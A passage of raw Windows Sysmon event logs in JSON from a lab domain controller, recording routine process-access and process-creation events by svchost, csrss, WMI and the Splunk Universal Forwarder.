{41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1040\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\System32\\combase.dll+4d01b|C:\\Windows\\System32\\combase.dll+9e002|C:\\Windows\\System32\\combase.dll+9e92e|C:\\Windows\\System32\\combase.dll+9e6ef|C:\\Windows\\System32\\combase.dll+3fff8|C:\\Windows\\System32\\combase.dll+3fc10|C:\\Windows\\System32\\combase.dll+4fa47|C:\\Windows\\System32\\combase.dll+c1ef4|C:\\Windows\\System32\\combase.dll+4ea07|C:\\Windows\\System32\\combase.dll+4a6d0|C:\\Windows\\System32\\combase.dll+3f5a|C:\\Windows\\System32\\RPCRT4.dll+dbd2a|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3f3|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.377","SourceProcessGUID":"{41C8662E-1F75-5F25-0000-00105D830300}","SourceProcessId":"4060","SourceThreadId":"4088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1040","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\System32\\combase.dll+4d01b|C:\\Windows\\System32\\combase.dll+9e002|C:\\Windows\\System32\\combase.dll+9e92e|C:\\Windows\\System32\\combase.dll+9e6ef|C:\\Windows\\System32\\combase.dll+3fff8|C:\\Windows\\System32\\combase.dll+3fc10|C:\\Windows\\System32\\combase.dll+4fa47|C:\\Windows\\System32\\combase.dll+c1ef4|C:\\Windows\\System32\\combase.dll+4ea07|C:\\Windows\\System32\\combase.dll+4a6d0|C:\\Windows\\System32\\combase.dll+3f5a|C:\\Windows\\System32\\RPCRT4.dll+dbd2a|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3f3|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1786,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.398\r\nProcessGuid: {41C8662E-1F75-5F25-0000-0010E3900300}\r\nProcessId: 3076\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1F74-5F25-0000-0010FC670300}\r\nParentProcessId: 3928\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.398","ProcessGuid":"{41C8662E-1F75-5F25-0000-0010E3900300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1F74-5F25-0000-0010FC670300}","ParentProcessId":"3928","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1787,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010FC670300}\r\nSourceProcessId: 3928\r\nSourceThreadId: 3932\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-0010E3900300}\r\nTargetProcessId: 3076\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+14ab4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010FC670300}","SourceProcessId":"3928","SourceThreadId":"3932","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-0010E3900300}","TargetProcessId":"3076","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+14ab4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1788,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-0010E3900300}\r\nTargetProcessId: 3076\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-0010E3900300}","TargetProcessId":"3076","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1789,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1790,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1791,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1792,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1793,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 